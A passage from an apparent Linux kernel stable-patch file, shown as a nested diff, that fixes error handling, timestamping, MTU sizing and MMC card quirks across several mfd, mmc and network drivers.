++		stmfx->vdd = NULL;
++		if (ret != -ENODEV)
+ 			return dev_err_probe(&client->dev, ret, "Failed to get VDD regulator\n");
+ 	}
+ 
+@@ -387,7 +386,7 @@ static int stmfx_chip_init(struct i2c_client *client)
+ 
+ err:
+ 	if (stmfx->vdd)
+-		return regulator_disable(stmfx->vdd);
++		regulator_disable(stmfx->vdd);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/mfd/stmpe.c b/drivers/mfd/stmpe.c
+index 0c4f74197d3e0..aef29221d7c12 100644
+--- a/drivers/mfd/stmpe.c
++++ b/drivers/mfd/stmpe.c
+@@ -1485,9 +1485,9 @@ int stmpe_probe(struct stmpe_client_info *ci, enum stmpe_partnum partnum)
+ 
+ void stmpe_remove(struct stmpe *stmpe)
+ {
+-	if (!IS_ERR(stmpe->vio))
++	if (!IS_ERR(stmpe->vio) && regulator_is_enabled(stmpe->vio))
+ 		regulator_disable(stmpe->vio);
+-	if (!IS_ERR(stmpe->vcc))
++	if (!IS_ERR(stmpe->vcc) && regulator_is_enabled(stmpe->vcc))
+ 		regulator_disable(stmpe->vcc);
+ 
+ 	__stmpe_disable(stmpe, STMPE_BLOCK_ADC);
+diff --git a/drivers/mfd/wcd934x.c b/drivers/mfd/wcd934x.c
+index 68e2fa2fda99c..32ed2bd863758 100644
+--- a/drivers/mfd/wcd934x.c
++++ b/drivers/mfd/wcd934x.c
+@@ -253,8 +253,9 @@ static int wcd934x_slim_probe(struct slim_device *sdev)
+ 	usleep_range(600, 650);
+ 	reset_gpio = devm_gpiod_get_optional(dev, "reset", GPIOD_OUT_LOW);
+ 	if (IS_ERR(reset_gpio)) {
+-		return dev_err_probe(dev, PTR_ERR(reset_gpio),
+-				"Failed to get reset gpio: err = %ld\n", PTR_ERR(reset_gpio));
++		ret = dev_err_probe(dev, PTR_ERR(reset_gpio),
++				    "Failed to get reset gpio\n");
++		goto err_disable_regulators;
+ 	}
+ 	msleep(20);
+ 	gpiod_set_value(reset_gpio, 1);
+@@ -264,6 +265,10 @@ static int wcd934x_slim_probe(struct slim_device *sdev)
+ 	dev_set_drvdata(dev, ddata);
+ 
+ 	return 0;
++
++err_disable_regulators:
++	regulator_bulk_disable(WCD934X_MAX_SUPPLY, ddata->supplies);
++	return ret;
+ }
+ 
+ static void wcd934x_slim_remove(struct slim_device *sdev)
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 8b1e8661c3d73..e5cabb9012135 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -2030,6 +2030,9 @@ static int fastrpc_device_register(struct device *dev, struct fastrpc_channel_ct
+ 	fdev->miscdev.fops = &fastrpc_fops;
+ 	fdev->miscdev.name = devm_kasprintf(dev, GFP_KERNEL, "fastrpc-%s%s",
+ 					    domain, is_secured ? "-secure" : "");
++	if (!fdev->miscdev.name)
++		return -ENOMEM;
++
+ 	err = misc_register(&fdev->miscdev);
+ 	if (!err) {
+ 		if (is_secured)
+diff --git a/drivers/misc/lkdtm/core.c b/drivers/misc/lkdtm/core.c
+index b4712ff196b4e..0772e4a4757e9 100644
+--- a/drivers/misc/lkdtm/core.c
++++ b/drivers/misc/lkdtm/core.c
+@@ -79,7 +79,7 @@ static struct crashpoint crashpoints[] = {
+ 	CRASHPOINT("INT_HARDWARE_ENTRY", "do_IRQ"),
+ 	CRASHPOINT("INT_HW_IRQ_EN",	 "handle_irq_event"),
+ 	CRASHPOINT("INT_TASKLET_ENTRY",	 "tasklet_action"),
+-	CRASHPOINT("FS_DEVRW",		 "ll_rw_block"),
++	CRASHPOINT("FS_SUBMIT_BH",		 "submit_bh"),
+ 	CRASHPOINT("MEM_SWAPOUT",	 "shrink_inactive_list"),
+ 	CRASHPOINT("TIMERADD",		 "hrtimer_start"),
+ 	CRASHPOINT("SCSI_QUEUE_RQ",	 "scsi_queue_rq"),
+diff --git a/drivers/mmc/core/card.h b/drivers/mmc/core/card.h
+index cfdd1ff40b865..4edf9057fa79d 100644
+--- a/drivers/mmc/core/card.h
++++ b/drivers/mmc/core/card.h
+@@ -53,6 +53,10 @@ struct mmc_fixup {
+ 	unsigned int manfid;
+ 	unsigned short oemid;
+ 
++	/* Manufacturing date */
++	unsigned short year;
++	unsigned char month;
++
+ 	/* SDIO-specific fields. You can use SDIO_ANY_ID here of course */
+ 	u16 cis_vendor, cis_device;
+ 
+@@ -68,6 +72,8 @@ struct mmc_fixup {
+ 
+ #define CID_MANFID_ANY (-1u)
+ #define CID_OEMID_ANY ((unsigned short) -1)
++#define CID_YEAR_ANY ((unsigned short) -1)
++#define CID_MONTH_ANY ((unsigned char) -1)
+ #define CID_NAME_ANY (NULL)
+ 
+ #define EXT_CSD_REV_ANY (-1u)
+@@ -81,17 +87,21 @@ struct mmc_fixup {
+ #define CID_MANFID_APACER       0x27
+ #define CID_MANFID_KINGSTON     0x70
+ #define CID_MANFID_HYNIX	0x90
++#define CID_MANFID_KINGSTON_SD	0x9F
+ #define CID_MANFID_NUMONYX	0xFE
+ 
+ #define END_FIXUP { NULL }
+ 
+-#define _FIXUP_EXT(_name, _manfid, _oemid, _rev_start, _rev_end,	\
+-		   _cis_vendor, _cis_device,				\
+-		   _fixup, _data, _ext_csd_rev)				\
++#define _FIXUP_EXT(_name, _manfid, _oemid, _year, _month,	\
++		   _rev_start, _rev_end,			\
++		   _cis_vendor, _cis_device,			\
++		   _fixup, _data, _ext_csd_rev)			\
+ 	{						\
+ 		.name = (_name),			\
+ 		.manfid = (_manfid),			\
+ 		.oemid = (_oemid),			\
++		.year = (_year),			\
++		.month = (_month),			\
+ 		.rev_start = (_rev_start),		\
+ 		.rev_end = (_rev_end),			\
+ 		.cis_vendor = (_cis_vendor),		\
+@@ -103,8 +113,8 @@ struct mmc_fixup {
+ 
+ #define MMC_FIXUP_REV(_name, _manfid, _oemid, _rev_start, _rev_end,	\
+ 		      _fixup, _data, _ext_csd_rev)			\
+-	_FIXUP_EXT(_name, _manfid,					\
+-		   _oemid, _rev_start, _rev_end,			\
++	_FIXUP_EXT(_name, _manfid, _oemid, CID_YEAR_ANY, CID_MONTH_ANY,	\
++		   _rev_start, _rev_end,				\
+ 		   SDIO_ANY_ID, SDIO_ANY_ID,				\
+ 		   _fixup, _data, _ext_csd_rev)				\
+ 
+@@ -118,8 +128,9 @@ struct mmc_fixup {
+ 		      _ext_csd_rev)
+ 
+ #define SDIO_FIXUP(_vendor, _device, _fixup, _data)			\
+-	_FIXUP_EXT(CID_NAME_ANY, CID_MANFID_ANY,			\
+-		    CID_OEMID_ANY, 0, -1ull,				\
++	_FIXUP_EXT(CID_NAME_ANY, CID_MANFID_ANY, CID_OEMID_ANY,		\
++		   CID_YEAR_ANY, CID_MONTH_ANY,				\
++		   0, -1ull,						\
+ 		   _vendor, _device,					\
+ 		   _fixup, _data, EXT_CSD_REV_ANY)			\
+ 
+@@ -264,4 +275,9 @@ static inline int mmc_card_broken_sd_discard(const struct mmc_card *c)
+ 	return c->quirks & MMC_QUIRK_BROKEN_SD_DISCARD;
+ }
+ 
++static inline int mmc_card_broken_sd_cache(const struct mmc_card *c)
++{
++	return c->quirks & MMC_QUIRK_BROKEN_SD_CACHE;
++}
++
+ #endif
+diff --git a/drivers/mmc/core/quirks.h b/drivers/mmc/core/quirks.h
+index 29b9497936df9..857315f185fcf 100644
+--- a/drivers/mmc/core/quirks.h
++++ b/drivers/mmc/core/quirks.h
+@@ -53,6 +53,15 @@ static const struct mmc_fixup __maybe_unused mmc_blk_fixups[] = {
+ 	MMC_FIXUP("MMC32G", CID_MANFID_TOSHIBA, CID_OEMID_ANY, add_quirk_mmc,
+ 		  MMC_QUIRK_BLK_NO_CMD23),
+ 
++	/*
++	 * Kingston Canvas Go! Plus microSD cards never finish SD cache flush.
++	 * This has so far only been observed on cards from 11/2019, while new
++	 * cards from 2023/05 do not exhibit this behavior.
++	 */
++	_FIXUP_EXT("SD64G", CID_MANFID_KINGSTON_SD, 0x5449, 2019, 11,
++		   0, -1ull, SDIO_ANY_ID, SDIO_ANY_ID, add_quirk_sd,
++		   MMC_QUIRK_BROKEN_SD_CACHE, EXT_CSD_REV_ANY),
++
+ 	/*
+ 	 * Some SD cards lockup while using CMD23 multiblock transfers.
+ 	 */
+@@ -100,6 +109,20 @@ static const struct mmc_fixup __maybe_unused mmc_blk_fixups[] = {
+ 	MMC_FIXUP("V10016", CID_MANFID_KINGSTON, CID_OEMID_ANY, add_quirk_mmc,
+ 		  MMC_QUIRK_TRIM_BROKEN),
+ 
++	/*
++	 * Kingston EMMC04G-M627 advertises TRIM but it does not seems to
++	 * support being used to offload WRITE_ZEROES.
++	 */
++	MMC_FIXUP("M62704", CID_MANFID_KINGSTON, 0x0100, add_quirk_mmc,
++		  MMC_QUIRK_TRIM_BROKEN),
++
++	/*
++	 * Micron MTFC4GACAJCN-1M advertises TRIM but it does not seems to
++	 * support being used to offload WRITE_ZEROES.
++	 */
++	MMC_FIXUP("Q2J54A", CID_MANFID_MICRON, 0x014e, add_quirk_mmc,
++		  MMC_QUIRK_TRIM_BROKEN),
++
+ 	/*
+ 	 * Some SD cards reports discard support while they don't
+ 	 */
+@@ -209,6 +232,10 @@ static inline void mmc_fixup_device(struct mmc_card *card,
+ 		if (f->of_compatible &&
+ 		    !mmc_fixup_of_compatible_match(card, f->of_compatible))
+ 			continue;
++		if (f->year != CID_YEAR_ANY && f->year != card->cid.year)
++			continue;
++		if (f->month != CID_MONTH_ANY && f->month != card->cid.month)
++			continue;
+ 
+ 		dev_dbg(&card->dev, "calling %ps\n", f->vendor_fixup);
+ 		f->vendor_fixup(card, f->data);
+diff --git a/drivers/mmc/core/sd.c b/drivers/mmc/core/sd.c
+index 72b664ed90cf6..246ce027ae0aa 100644
+--- a/drivers/mmc/core/sd.c
++++ b/drivers/mmc/core/sd.c
+@@ -1170,7 +1170,7 @@ static int sd_parse_ext_reg_perf(struct mmc_card *card, u8 fno, u8 page,
+ 		card->ext_perf.feature_support |= SD_EXT_PERF_HOST_MAINT;
+ 
+ 	/* Cache support at bit 0. */
+-	if (reg_buf[4] & BIT(0))
++	if ((reg_buf[4] & BIT(0)) && !mmc_card_broken_sd_cache(card))
+ 		card->ext_perf.feature_support |= SD_EXT_PERF_CACHE;
+ 
+ 	/* Command queue support indicated via queue depth bits (0 to 4). */
+diff --git a/drivers/mmc/host/mmci.c b/drivers/mmc/host/mmci.c
+index 1c326e4307f4a..9728b093f4dba 100644
+--- a/drivers/mmc/host/mmci.c
++++ b/drivers/mmc/host/mmci.c
+@@ -2456,6 +2456,7 @@ static struct amba_driver mmci_driver = {
+ 	.drv		= {
+ 		.name	= DRIVER_NAME,
+ 		.pm	= &mmci_dev_pm_ops,
++		.probe_type = PROBE_PREFER_ASYNCHRONOUS,
+ 	},
+ 	.probe		= mmci_probe,
+ 	.remove		= mmci_remove,
+diff --git a/drivers/mmc/host/mtk-sd.c b/drivers/mmc/host/mtk-sd.c
+index 425efb3fba048..1a0d4dc24717c 100644
+--- a/drivers/mmc/host/mtk-sd.c
++++ b/drivers/mmc/host/mtk-sd.c
+@@ -2685,7 +2685,7 @@ static int msdc_drv_probe(struct platform_device *pdev)
+ 
+ 	/* Support for SDIO eint irq ? */
+ 	if ((mmc->pm_caps & MMC_PM_WAKE_SDIO_IRQ) && (mmc->pm_caps & MMC_PM_KEEP_POWER)) {
+-		host->eint_irq = platform_get_irq_byname(pdev, "sdio_wakeup");
++		host->eint_irq = platform_get_irq_byname_optional(pdev, "sdio_wakeup");
+ 		if (host->eint_irq > 0) {
+ 			host->pins_eint = pinctrl_lookup_state(host->pinctrl, "state_eint");
+ 			if (IS_ERR(host->pins_eint)) {
+diff --git a/drivers/mmc/host/sdhci.c b/drivers/mmc/host/sdhci.c
+index 632341911b6e7..ad73d528a1bd4 100644
+--- a/drivers/mmc/host/sdhci.c
++++ b/drivers/mmc/host/sdhci.c
+@@ -1181,6 +1181,8 @@ static void sdhci_prepare_data(struct sdhci_host *host, struct mmc_command *cmd)
+ 		}
+ 	}
+ 
++	sdhci_config_dma(host);
++
+ 	if (host->flags & SDHCI_REQ_USE_DMA) {
+ 		int sg_cnt = sdhci_pre_dma_transfer(host, data, COOKIE_MAPPED);
+ 
+@@ -1200,8 +1202,6 @@ static void sdhci_prepare_data(struct sdhci_host *host, struct mmc_command *cmd)
+ 		}
+ 	}
+ 
+-	sdhci_config_dma(host);
+-
+ 	if (!(host->flags & SDHCI_REQ_USE_DMA)) {
+ 		int flags;
+ 
+diff --git a/drivers/mtd/parsers/Kconfig b/drivers/mtd/parsers/Kconfig
+index aaa06050c9bc9..c8f628a0689d7 100644
+--- a/drivers/mtd/parsers/Kconfig
++++ b/drivers/mtd/parsers/Kconfig
+@@ -22,7 +22,7 @@ config MTD_BCM63XX_PARTS
+ 
+ config MTD_BRCM_U_BOOT
+ 	tristate "Broadcom's U-Boot partition parser"
+-	depends on ARCH_BCM4908 || COMPILE_TEST
++	depends on ARCH_BCMBCA || COMPILE_TEST
+ 	help
+ 	  Broadcom uses a custom way of storing U-Boot environment variables.
+ 	  They are placed inside U-Boot partition itself at unspecified offset.
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 9ed80f7106515..91d84df91123b 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -4168,7 +4168,7 @@ u32 bond_xmit_hash(struct bonding *bond, struct sk_buff *skb)
+ 		return skb->hash;
+ 
+ 	return __bond_xmit_hash(bond, skb, skb->data, skb->protocol,
+-				skb_mac_offset(skb), skb_network_offset(skb),
++				0, skb_network_offset(skb),
+ 				skb_headlen(skb));
+ }
+ 
+diff --git a/drivers/net/can/kvaser_pciefd.c b/drivers/net/can/kvaser_pciefd.c
+index 956a4a57396f9..74a47244f1291 100644
+--- a/drivers/net/can/kvaser_pciefd.c
++++ b/drivers/net/can/kvaser_pciefd.c
+@@ -538,6 +538,13 @@ static int kvaser_pciefd_set_tx_irq(struct kvaser_pciefd_can *can)
+ 	return 0;
+ }
+ 
++static inline void kvaser_pciefd_set_skb_timestamp(const struct kvaser_pciefd *pcie,
++						   struct sk_buff *skb, u64 timestamp)
++{
++	skb_hwtstamps(skb)->hwtstamp =
++		ns_to_ktime(div_u64(timestamp * 1000, pcie->freq_to_ticks_div));
++}
++
+ static void kvaser_pciefd_setup_controller(struct kvaser_pciefd_can *can)
+ {
+ 	u32 mode;
+@@ -1171,7 +1178,6 @@ static int kvaser_pciefd_handle_data_packet(struct kvaser_pciefd *pcie,
+ 	struct canfd_frame *cf;
+ 	struct can_priv *priv;
+ 	struct net_device_stats *stats;
+-	struct skb_shared_hwtstamps *shhwtstamps;
+ 	u8 ch_id = (p->header[1] >> KVASER_PCIEFD_PACKET_CHID_SHIFT) & 0x7;
+ 
+ 	if (ch_id >= pcie->nr_channels)
+@@ -1214,12 +1220,7 @@ static int kvaser_pciefd_handle_data_packet(struct kvaser_pciefd *pcie,
+ 		stats->rx_bytes += cf->len;
+ 	}
+ 	stats->rx_packets++;
+-
+-	shhwtstamps = skb_hwtstamps(skb);
+-
+-	shhwtstamps->hwtstamp =
+-		ns_to_ktime(div_u64(p->timestamp * 1000,
+-				    pcie->freq_to_ticks_div));
++	kvaser_pciefd_set_skb_timestamp(pcie, skb, p->timestamp);
+ 
+ 	return netif_rx(skb);
+ }
+@@ -1282,7 +1283,6 @@ static int kvaser_pciefd_rx_error_frame(struct kvaser_pciefd_can *can,
+ 	struct net_device *ndev = can->can.dev;
+ 	struct sk_buff *skb;
+ 	struct can_frame *cf = NULL;
+-	struct skb_shared_hwtstamps *shhwtstamps;
+ 	struct net_device_stats *stats = &ndev->stats;
+ 
+ 	old_state = can->can.state;
+@@ -1323,10 +1323,7 @@ static int kvaser_pciefd_rx_error_frame(struct kvaser_pciefd_can *can,
+ 		return -ENOMEM;
+ 	}
+ 
+-	shhwtstamps = skb_hwtstamps(skb);
+-	shhwtstamps->hwtstamp =
+-		ns_to_ktime(div_u64(p->timestamp * 1000,
+-				    can->kv_pcie->freq_to_ticks_div));
++	kvaser_pciefd_set_skb_timestamp(can->kv_pcie, skb, p->timestamp);
+ 	cf->can_id |= CAN_ERR_BUSERROR | CAN_ERR_CNT;
+ 
+ 	cf->data[6] = bec.txerr;
+@@ -1374,7 +1371,6 @@ static int kvaser_pciefd_handle_status_resp(struct kvaser_pciefd_can *can,
+ 		struct net_device *ndev = can->can.dev;
+ 		struct sk_buff *skb;
+ 		struct can_frame *cf;
+-		struct skb_shared_hwtstamps *shhwtstamps;
+ 
+ 		skb = alloc_can_err_skb(ndev, &cf);
+ 		if (!skb) {
+@@ -1394,10 +1390,7 @@ static int kvaser_pciefd_handle_status_resp(struct kvaser_pciefd_can *can,
+ 			cf->can_id |= CAN_ERR_RESTARTED;
+ 		}
+ 
+-		shhwtstamps = skb_hwtstamps(skb);
+-		shhwtstamps->hwtstamp =
+-			ns_to_ktime(div_u64(p->timestamp * 1000,
+-					    can->kv_pcie->freq_to_ticks_div));
++		kvaser_pciefd_set_skb_timestamp(can->kv_pcie, skb, p->timestamp);
+ 
+ 		cf->data[6] = bec.txerr;
+ 		cf->data[7] = bec.rxerr;
+@@ -1526,6 +1519,7 @@ static void kvaser_pciefd_handle_nack_packet(struct kvaser_pciefd_can *can,
+ 
+ 	if (skb) {
+ 		cf->can_id |= CAN_ERR_BUSERROR;
++		kvaser_pciefd_set_skb_timestamp(can->kv_pcie, skb, p->timestamp);
+ 		netif_rx(skb);
+ 	} else {
+ 		stats->rx_dropped++;
+@@ -1557,8 +1551,15 @@ static int kvaser_pciefd_handle_ack_packet(struct kvaser_pciefd *pcie,
+ 		netdev_dbg(can->can.dev, "Packet was flushed\n");
+ 	} else {
+ 		int echo_idx = p->header[0] & KVASER_PCIEFD_PACKET_SEQ_MSK;
+-		int dlc = can_get_echo_skb(can->can.dev, echo_idx, NULL);
+-		u8 count = ioread32(can->reg_base +
++		int dlc;
++		u8 count;
++		struct sk_buff *skb;
++
++		skb = can->can.echo_skb[echo_idx];
++		if (skb)
++			kvaser_pciefd_set_skb_timestamp(pcie, skb, p->timestamp);
++		dlc = can_get_echo_skb(can->can.dev, echo_idx, NULL);
++		count = ioread32(can->reg_base +
+ 				    KVASER_PCIEFD_KCAN_TX_NPACKETS_REG) & 0xff;
+ 
+ 		if (count < KVASER_PCIEFD_CAN_TX_MAX_COUNT &&
+diff --git a/drivers/net/dsa/ocelot/felix.c b/drivers/net/dsa/ocelot/felix.c
+index dd3a18cc89dd2..4faabc4364aa7 100644
+--- a/drivers/net/dsa/ocelot/felix.c
++++ b/drivers/net/dsa/ocelot/felix.c
+@@ -1705,6 +1705,18 @@ static bool felix_rxtstamp(struct dsa_switch *ds, int port,
+ 	u32 tstamp_hi;
+ 	u64 tstamp;
+ 
++	switch (type & PTP_CLASS_PMASK) {
++	case PTP_CLASS_L2:
++		if (!(ocelot->ports[port]->trap_proto & OCELOT_PROTO_PTP_L2))
++			return false;
++		break;
++	case PTP_CLASS_IPV4:
++	case PTP_CLASS_IPV6:
++		if (!(ocelot->ports[port]->trap_proto & OCELOT_PROTO_PTP_L4))
++			return false;
++		break;
++	}
++
+ 	/* If the "no XTR IRQ" workaround is in use, tell DSA to defer this skb
+ 	 * for RX timestamping. Then free it, and poll for its copy through
+ 	 * MMIO in the CPU port module, and inject that into the stack from
+diff --git a/drivers/net/dsa/sja1105/sja1105.h b/drivers/net/dsa/sja1105/sja1105.h
+index 9ba2ec2b966d9..fb3cd4c78faa8 100644
+--- a/drivers/net/dsa/sja1105/sja1105.h
++++ b/drivers/net/dsa/sja1105/sja1105.h
+@@ -250,6 +250,7 @@ struct sja1105_private {
+ 	unsigned long ucast_egress_floods;
+ 	unsigned long bcast_egress_floods;
+ 	unsigned long hwts_tx_en;
++	unsigned long hwts_rx_en;
+ 	const struct sja1105_info *info;
+ 	size_t max_xfer_len;
+ 	struct spi_device *spidev;
+@@ -287,7 +288,6 @@ struct sja1105_spi_message {
+ /* From sja1105_main.c */
+ enum sja1105_reset_reason {
+ 	SJA1105_VLAN_FILTERING = 0,
+-	SJA1105_RX_HWTSTAMPING,
+ 	SJA1105_AGEING_TIME,
+ 	SJA1105_SCHEDULING,
+ 	SJA1105_BEST_EFFORT_POLICING,
+diff --git a/drivers/net/dsa/sja1105/sja1105_main.c b/drivers/net/dsa/sja1105/sja1105_main.c
+index b70dcf32a26dc..947e8f7c09880 100644
+--- a/drivers/net/dsa/sja1105/sja1105_main.c
++++ b/drivers/net/dsa/sja1105/sja1105_main.c
+@@ -866,12 +866,12 @@ static int sja1105_init_general_params(struct sja1105_private *priv)
+ 		.hostprio = 7,
+ 		.mac_fltres1 = SJA1105_LINKLOCAL_FILTER_A,
+ 		.mac_flt1    = SJA1105_LINKLOCAL_FILTER_A_MASK,
+-		.incl_srcpt1 = false,
+-		.send_meta1  = false,
++		.incl_srcpt1 = true,
++		.send_meta1  = true,
+ 		.mac_fltres0 = SJA1105_LINKLOCAL_FILTER_B,
+ 		.mac_flt0    = SJA1105_LINKLOCAL_FILTER_B_MASK,
+-		.incl_srcpt0 = false,
+-		.send_meta0  = false,
++		.incl_srcpt0 = true,
++		.send_meta0  = true,
+ 		/* Default to an invalid value */
+ 		.mirr_port = priv->ds->num_ports,
+ 		/* No TTEthernet */
+@@ -2215,7 +2215,6 @@ static int sja1105_reload_cbs(struct sja1105_private *priv)
+ 
+ static const char * const sja1105_reset_reasons[] = {
+ 	[SJA1105_VLAN_FILTERING] = "VLAN filtering",
+-	[SJA1105_RX_HWTSTAMPING] = "RX timestamping",
+ 	[SJA1105_AGEING_TIME] = "Ageing time",
+ 	[SJA1105_SCHEDULING] = "Time-aware scheduling",
+ 	[SJA1105_BEST_EFFORT_POLICING] = "Best-effort policing",
+@@ -2407,11 +2406,6 @@ int sja1105_vlan_filtering(struct dsa_switch *ds, int port, bool enabled,
+ 	general_params->tpid = tpid;
+ 	/* EtherType used to identify outer tagged (S-tag) VLAN traffic */
+ 	general_params->tpid2 = tpid2;
+-	/* When VLAN filtering is on, we need to at least be able to
+-	 * decode management traffic through the "backup plan".
+-	 */
+-	general_params->incl_srcpt1 = enabled;
+-	general_params->incl_srcpt0 = enabled;
+ 
+ 	for (port = 0; port < ds->num_ports; port++) {
+ 		if (dsa_is_unused_port(ds, port))
+diff --git a/drivers/net/dsa/sja1105/sja1105_ptp.c b/drivers/net/dsa/sja1105/sja1105_ptp.c
+index 30fb2cc40164b..a7d41e7813982 100644
+--- a/drivers/net/dsa/sja1105/sja1105_ptp.c
++++ b/drivers/net/dsa/sja1105/sja1105_ptp.c
+@@ -58,35 +58,10 @@ enum sja1105_ptp_clk_mode {
+ #define ptp_data_to_sja1105(d) \
+ 		container_of((d), struct sja1105_private, ptp_data)
+ 
+-/* Must be called only while the RX timestamping state of the tagger
+- * is turned off
+- */
+-static int sja1105_change_rxtstamping(struct sja1105_private *priv,
+-				      bool on)
+-{
+-	struct sja1105_ptp_data *ptp_data = &priv->ptp_data;
+-	struct sja1105_general_params_entry *general_params;
+-	struct sja1105_table *table;
+-
+-	table = &priv->static_config.tables[BLK_IDX_GENERAL_PARAMS];
+-	general_params = table->entries;
+-	general_params->send_meta1 = on;
+-	general_params->send_meta0 = on;
+-
+-	ptp_cancel_worker_sync(ptp_data->clock);
+-	skb_queue_purge(&ptp_data->skb_txtstamp_queue);
+-	skb_queue_purge(&ptp_data->skb_rxtstamp_queue);
+-
+-	return sja1105_static_config_reload(priv, SJA1105_RX_HWTSTAMPING);
+-}
+-
+ int sja1105_hwtstamp_set(struct dsa_switch *ds, int port, struct ifreq *ifr)
+ {
+-	struct sja1105_tagger_data *tagger_data = sja1105_tagger_data(ds);
+ 	struct sja1105_private *priv = ds->priv;
+ 	struct hwtstamp_config config;
+-	bool rx_on;
+-	int rc;
+ 
+ 	if (copy_from_user(&config, ifr->ifr_data, sizeof(config)))
+ 		return -EFAULT;
+@@ -104,26 +79,13 @@ int sja1105_hwtstamp_set(struct dsa_switch *ds, int port, struct ifreq *ifr)
+ 
+ 	switch (config.rx_filter) {
+ 	case HWTSTAMP_FILTER_NONE:
+-		rx_on = false;
++		priv->hwts_rx_en &= ~BIT(port);
+ 		break;
+ 	default:
+-		rx_on = true;
++		priv->hwts_rx_en |= BIT(port);
+ 		break;
+ 	}
+ 
+-	if (rx_on != tagger_data->rxtstamp_get_state(ds)) {
+-		tagger_data->rxtstamp_set_state(ds, false);
+-
+-		rc = sja1105_change_rxtstamping(priv, rx_on);
+-		if (rc < 0) {
+-			dev_err(ds->dev,
+-				"Failed to change RX timestamping: %d\n", rc);
+-			return rc;
+-		}
+-		if (rx_on)
+-			tagger_data->rxtstamp_set_state(ds, true);
+-	}
+-
+ 	if (copy_to_user(ifr->ifr_data, &config, sizeof(config)))
+ 		return -EFAULT;
+ 	return 0;
+@@ -131,7 +93,6 @@ int sja1105_hwtstamp_set(struct dsa_switch *ds, int port, struct ifreq *ifr)
+ 
+ int sja1105_hwtstamp_get(struct dsa_switch *ds, int port, struct ifreq *ifr)
+ {
+-	struct sja1105_tagger_data *tagger_data = sja1105_tagger_data(ds);
+ 	struct sja1105_private *priv = ds->priv;
+ 	struct hwtstamp_config config;
+ 
+@@ -140,7 +101,7 @@ int sja1105_hwtstamp_get(struct dsa_switch *ds, int port, struct ifreq *ifr)
+ 		config.tx_type = HWTSTAMP_TX_ON;
+ 	else
+ 		config.tx_type = HWTSTAMP_TX_OFF;
+-	if (tagger_data->rxtstamp_get_state(ds))
++	if (priv->hwts_rx_en & BIT(port))
+ 		config.rx_filter = HWTSTAMP_FILTER_PTP_V2_L2_EVENT;
+ 	else
+ 		config.rx_filter = HWTSTAMP_FILTER_NONE;
+@@ -413,11 +374,10 @@ static long sja1105_rxtstamp_work(struct ptp_clock_info *ptp)
+ 
+ bool sja1105_rxtstamp(struct dsa_switch *ds, int port, struct sk_buff *skb)
+ {
+-	struct sja1105_tagger_data *tagger_data = sja1105_tagger_data(ds);
+ 	struct sja1105_private *priv = ds->priv;
+ 	struct sja1105_ptp_data *ptp_data = &priv->ptp_data;
+ 
+-	if (!tagger_data->rxtstamp_get_state(ds))
++	if (!(priv->hwts_rx_en & BIT(port)))
+ 		return false;
+ 
+ 	/* We need to read the full PTP clock to reconstruct the Rx
+diff --git a/drivers/net/dsa/vitesse-vsc73xx-core.c b/drivers/net/dsa/vitesse-vsc73xx-core.c
+index ae55167ce0a6f..ef1a4a7c47b23 100644
+--- a/drivers/net/dsa/vitesse-vsc73xx-core.c
++++ b/drivers/net/dsa/vitesse-vsc73xx-core.c
+@@ -1025,17 +1025,17 @@ static int vsc73xx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 	struct vsc73xx *vsc = ds->priv;
+ 
+ 	return vsc73xx_write(vsc, VSC73XX_BLOCK_MAC, port,
+-			     VSC73XX_MAXLEN, new_mtu);
++			     VSC73XX_MAXLEN, new_mtu + ETH_HLEN + ETH_FCS_LEN);
+ }
+ 
+ /* According to application not "VSC7398 Jumbo Frames" setting
+- * up the MTU to 9.6 KB does not affect the performance on standard
++ * up the frame size to 9.6 KB does not affect the performance on standard
+  * frames. It is clear from the application note that
+  * "9.6 kilobytes" == 9600 bytes.
+  */
+ static int vsc73xx_get_max_mtu(struct dsa_switch *ds, int port)
+ {
+-	return 9600;
++	return 9600 - ETH_HLEN - ETH_FCS_LEN;
+ }
+ 
+ static const struct dsa_switch_ops vsc73xx_ds_ops = {
+diff --git a/drivers/net/ethernet/broadcom/tg3.c b/drivers/net/ethernet/broadcom/tg3.c
+index af9ea5e4371b3..9609041016776 100644
+--- a/drivers/net/ethernet/broadcom/tg3.c
++++ b/drivers/net/ethernet/broadcom/tg3.c
+@@ -224,6 +224,7 @@ MODULE_AUTHOR("David S. Miller (davem@redhat.com) and Jeff Garzik (jgarzik@pobox
+ MODULE_DESCRIPTION("Broadcom Tigon3 ethernet driver");
+ MODULE_LICENSE("GPL");
+ MODULE_FIRMWARE(FIRMWARE_TG3);
++MODULE_FIRMWARE(FIRMWARE_TG357766);
+ MODULE_FIRMWARE(FIRMWARE_TG3TSO);
+ MODULE_FIRMWARE(FIRMWARE_TG3TSO5);
+ 
+diff --git a/drivers/net/ethernet/ibm/ibmvnic.c b/drivers/net/ethernet/ibm/ibmvnic.c
+index 9282381a438fe..bc97f24b08270 100644
+--- a/drivers/net/ethernet/ibm/ibmvnic.c
++++ b/drivers/net/ethernet/ibm/ibmvnic.c
+@@ -1625,7 +1625,14 @@ static int __ibmvnic_open(struct net_device *netdev)
+ 		if (prev_state == VNIC_CLOSED)
+ 			enable_irq(adapter->tx_scrq[i]->irq);
+ 		enable_scrq_irq(adapter, adapter->tx_scrq[i]);
+-		netdev_tx_reset_queue(netdev_get_tx_queue(netdev, i));
++		/* netdev_tx_reset_queue will reset dql stats. During NON_FATAL
++		 * resets, don't reset the stats because there could be batched
++		 * skb's waiting to be sent. If we reset dql stats, we risk
++		 * num_completed being greater than num_queued. This will cause
++		 * a BUG_ON in dql_completed().
++		 */
++		if (adapter->reset_reason != VNIC_RESET_NON_FATAL)
++			netdev_tx_reset_queue(netdev_get_tx_queue(netdev, i));
+ 	}
+ 
+ 	rc = set_link_state(adapter, IBMVNIC_LOGICAL_LNK_UP);
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index ca6b877fdde81..f2be383d97df5 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -491,6 +491,12 @@ enum ice_pf_flags {
+ 	ICE_PF_FLAGS_NBITS		/* must be last */
+ };
+ 
